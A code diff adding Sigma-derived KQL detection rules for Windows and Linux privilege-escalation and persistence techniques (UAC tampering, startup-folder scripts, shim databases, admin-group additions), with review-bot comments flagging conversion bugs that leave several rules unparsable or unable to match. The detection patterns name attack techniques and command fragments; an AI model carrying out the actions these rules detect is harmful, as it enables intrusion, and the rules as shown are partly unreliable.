+// Title: Suspicious Screensaver Binary File Creation
+// Author: frack113
+// Date: 2021-12-29
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002
+
+DeviceFileEvents
+| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
new file mode 100644
index 00000000..ca67fbfe
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
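Review bot: The second description line, `Screensavers are programs that execute ...`, is emitted without the `//` prefix, so the file is not valid KQL: the parser will read that sentence as a query statement and reject the whole rule. Every continuation line of a multi-line Sigma description needs to start with `// `, and because the same shape appears in other rules in this patch the fix belongs in the conversion script rather than in this one file. Separately, the query has no `ActionType` filter, so the title's "File Creation" also covers modification, rename and deletion of `.scr` files; add `ActionType == "FileCreated"` if creation is the intent.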
@@ -0,0 +1,10 @@
+// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql
new file mode 100644
index 00000000..4c4db164
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Shim Database Patching Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql
new file mode 100644
index 00000000..c0cd8516
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql
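Review bot: The first predicate `RegistryKey endswith "...\\AppCompatFlags\\Custom*"` treats the `*` literally (KQL `endswith` has no wildcards), and it is ANDed with `RegistryKey endswith "\\csrss.exe"` etc., which can never both be true, so this rule cannot match anything. The Sigma wildcard should become a substring test: `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\"`. The trailing-`*` handling looks like a backend conversion gap, so the other registry rules in this patch are worth checking for the same shape.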
@@ -0,0 +1,15 @@
+// Title: Suspicious Startup Folder Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.
+These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.
+This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001
+// False Positives:
+// - Rare legitimate usage of some of the extensions mentioned in the rule
+
+DeviceFileEvents
+| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".jse" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psd1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".url" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql
new file mode 100644
index 00000000..8892aae9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql
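Review bot: The two description continuation lines (`These files (.ps1, ...` and `This technique is frequently ...`) have no `//` prefix, so the file fails to parse as KQL before the query is even reached; prefix each with `// `. The query also has no `ActionType` constraint, so deletions and renames inside the Startup folder alert alongside the creations the description talks about — `ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileModified", "FileRenamed")`) would pin that down.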
@@ -0,0 +1,12 @@
+// Title: Suspicious Userinit Child Process
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
+// Date: 2019-06-17
+// Level: medium
+// Description: Detects a suspicious child process of userinit
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(((FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe" or ProcessCommandLine =~ "C:\\Windows\\Explorer.EXE") or ProcessCommandLine contains "\\netlogon\\" or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql
new file mode 100644
index 00000000..3e913122
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql
@@ -0,0 +1,12 @@
+// Title: Sysinternals PsService Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-16
+// Level: medium
+// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
+// False Positives:
+// - Legitimate use of PsService by an administrator
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql
new file mode 100644
index 00000000..6bdb231f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql
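Review bot: In the first hunk the exclusion `isnull(FolderPath)` is a no-op: Kusto string columns cannot hold null, so `isnull()` on a string is always false and events with an empty image path are still reported. Use `isempty(FolderPath)`, which covers both null and the empty string, if the intent is to skip events where the image path is missing.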
@@ -0,0 +1,10 @@
+// Title: Sysinternals PsSuspend Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-23
+// Level: medium
+// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql
new file mode 100644
index 00000000..217ecf3a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: System Scripts Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
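Review bot: In the second hunk (system_scripts_autorun_keys_modification.kql) the exclusion `not(RegistryValueData =~ "(Empty)")` never matches, because `(Empty)` is Sysmon's rendering of an empty value and DeviceRegistryEvents just reports an empty string, so every zero-length value write passes straight through. Replace it with `not(isempty(RegistryValueData))`, and apply the same replacement wherever the converter emitted `(Empty)`.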
diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql
new file mode 100644
index 00000000..898abe2f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql
@@ -0,0 +1,13 @@
+// Title: Tasks Folder Evasion
+// Author: Sreeman
+// Date: 2020-01-13
+// Level: high
+// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
+Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
+in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql
new file mode 100644
index 00000000..516509cd
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql
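Review bot: The description's continuation lines `Adversaries can take advantage ...` and `in Tasks to load and execute ...` are written without `//`, so the KQL parser sees them as statements and the rule fails to load; every continuation line needs a `// ` prefix. This looks like a converter issue with multi-line Sigma descriptions rather than a one-off, so the script is the right place to fix it.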
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Default Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "ebpfbackdoor"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql
new file mode 100644
index 00000000..39e864a4
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql
@@ -0,0 +1,10 @@
+// Title: TrustedPath UAC Bypass Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-27
+// Level: critical
+// Description: Detects indicators of a UAC bypass method by mocking directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath contains "C:\\Windows \\System32\\" or FolderPath contains "C:\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/Privilege Escalation/uac_disabled.kql
new file mode 100644
index 00000000..4e5c63ad
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/uac_disabled.kql
@@ -0,0 +1,11 @@
+// Title: UAC Disabled
+// Author: frack113
+// Date: 2022-01-05
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql
new file mode 100644
index 00000000..d20cf544
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql
@@ -0,0 +1,13 @@
+// Title: UAC Notification Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
+UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
+When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql
new file mode 100644
index 00000000..ab521f3a
--- /dev/null
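Review bot: The `where` clause of the uac_disabled hunk cannot match on DeviceRegistryEvents: `EnableLUA` is a value name, which the table reports in `RegistryValueName` rather than at the end of `RegistryKey`, and DWORD data is surfaced as the decimal string (`"0"`, with `RegistryValueType == "Dword"`), not Sysmon's `DWORD (0x00000000)` rendering. A working form is `| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" and RegistryValueName =~ "EnableLUA" and RegistryValueData == "0"`. Both problems come from how the Sigma `TargetObject`/`Details` fields are mapped onto the MDE schema, so they belong in the converter's field mapping rather than in a hand edit of this one file.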
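Review bot: The uac_notification_disabled hunk has the same mapping problems: `\\Microsoft\\Security Center\\UACDisableNotify` puts a value name into `RegistryKey`, and `DWORD (0x00000001)` is a Sysmon format that DeviceRegistryEvents does not produce, so the rule cannot fire. Use `RegistryKey endswith "\\Microsoft\\Security Center" and RegistryValueName =~ "UACDisableNotify" and RegistryValueData == "1"`. The two description continuation lines (`UAC is a critical ...` and `When "UACDisableNotify" ...`) also lack the `//` prefix and make the file unparsable.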
+++ b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql
@@ -0,0 +1,13 @@
+// Title: UAC Secure Desktop Prompt Disabled
+// Author: frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
+The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
+When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql
new file mode 100644
index 00000000..d358013c
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql
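Review bot: `PromptOnSecureDesktop` is a value name, so `RegistryKey contains "...\\System\\PromptOnSecureDesktop"` never matches in DeviceRegistryEvents, and `DWORD (0x00000000)` is a Sysmon rendering the table does not emit; as written the rule cannot fire. A working form is `| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" and RegistryValueName =~ "PromptOnSecureDesktop" and RegistryValueData == "0"`. The description continuation lines starting `The "PromptOnSecureDesktop" setting ...` and `When "PromptOnSecureDesktop" ...` are also missing the `//` prefix and will break parsing.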
@@ -0,0 +1,12 @@
+// Title: Uncommon Userinit Child Process
+// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
+// Date: 2019-01-12
+// Level: high
+// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence
+// False Positives:
+// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql
new file mode 100644
index 00000000..6eceee37
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql
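Review bot: `isnull(FolderPath)` in the exclusion list never evaluates to true — Kusto strings have no null — so an event with an empty image path is not excluded the way the filter intends. Replace it with `isempty(FolderPath)`, which handles both the null and the empty-string case.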
@@ -0,0 +1,12 @@
+// Title: User Added To Highly Privileged Group
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
+// False Positives:
+// - Administrative activity that must be investigated
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql
new file mode 100644
index 00000000..0af8a856
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql
@@ -0,0 +1,12 @@
+// Title: User Added to Local Administrators Group
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
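Review bot: The first hunk requires `localgroup ` (or `Add-LocalGroupMember`) alongside `Group Policy Creator Owners`/`Schema Admins`, but those are domain groups that are normally populated with `net group "Schema Admins" <user> /add /domain` or `Add-ADGroupMember`, so the most common path into the privileged group is not matched. If that is not a deliberate scoping inherited from the upstream rule, add `(ProcessCommandLine contains " group " and ProcessCommandLine contains " /add")` and `ProcessCommandLine contains "Add-ADGroupMember "` as further alternatives. The local-administrators hunk on the same line is unaffected, since `localgroup` is the right verb there.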
diff --git a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql
new file mode 100644
index 00000000..a7b88820
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Root/Sudoers Group Using Usermod
+// Author: TuanLe (GTSC)
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-aG root" or ProcessCommandLine contains "-aG sudoers") and FolderPath endswith "/usermod"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql
new file mode 100644
index 00000000..14a52d18
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql
@@ -0,0 +1,10 @@
+// Title: Using SettingSyncHost.exe as LOLBin
+// Author: Anton Kutepov, oscd.community
+// Date: 2020-02-05
+// Level: high
+// Description: Detects using SettingSyncHost.exe to run hijacked binary
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008
+
+DeviceProcessEvents
+| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
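Review bot: The usermod hunk's description has a duplicated phrase and a typo (`add users add users to the root or suoders groups`); it should read `// Description: Detects usage of the "usermod" binary to add users to the root or sudoers groups`. The match is also limited to the literal `-aG root` / `-aG sudoers` spelling, so `-G root -a`, `--append --groups root` or `-a -G sudo` go unmatched; that may mirror the upstream rule, but a one-line `// Note:` saying so would help whoever tunes it. The Tags line carries no technique ID, unlike the other rules in this patch.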
diff --git a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql
new file mode 100644
index 00000000..c545c7c2
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql
@@ -0,0 +1,10 @@
+// Title: VBScript Payload Stored in Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql
new file mode 100644
index 00000000..3b7b7f7f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql
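Review bot: The msiexec exclusion ends with `RegistryKey endswith "...\\Installer\\UserData*"`, where the `*` is a literal character to KQL `endswith`, so that branch of the `not(...)` never matches and the intended false-positive filter is dead — every Microsoft.mshtml installer write under that key will alert. Change it to `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\"`. Trailing-wildcard handling should be fixed in the conversion script, since the same shape appears in other rules in this patch.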
@@ -0,0 +1,10 @@
+// Title: Whoami.EXE Execution From Privileged Process
+// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
+// Date: 2022-01-28
+// Level: high
+// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql
new file mode 100644
index 00000000..1e929cb5
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql
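Review bot: `AccountName contains "AUTHORI"` / `"AUTORI"` will not match SYSTEM executions in DeviceProcessEvents, because the table splits the principal into `AccountName` (`system`) and `AccountDomain` (`nt authority`); the Sigma `User` field this was converted from is the combined `DOMAIN\User` string. As far as I can tell from the schema, the intended set is reached with `(AccountSid == "S-1-5-18" or AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI" or AccountName contains "TrustedInstaller")`. The TrustedInstaller term is worth confirming against a real event too, since that service also runs under the SYSTEM SID.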
@@ -0,0 +1,13 @@
+// Title: Windows Event Log Access Tampering Via Registry
+// Author: X__Junior
+// Date: 2025-01-16
+// Level: high
+// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112
+// False Positives:
+// - Administrative activity, still unlikely
+
+DeviceRegistryEvents
+| where ((RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD") or ((RegistryKey endswith "\\Policies\\Microsoft\\Windows\\EventLog*" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryKey endswith "\\ChannelAccess")) and (RegistryValueData contains "D:(D;" or (RegistryValueData contains "D:(" and RegistryValueData contains ")(D;")) and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
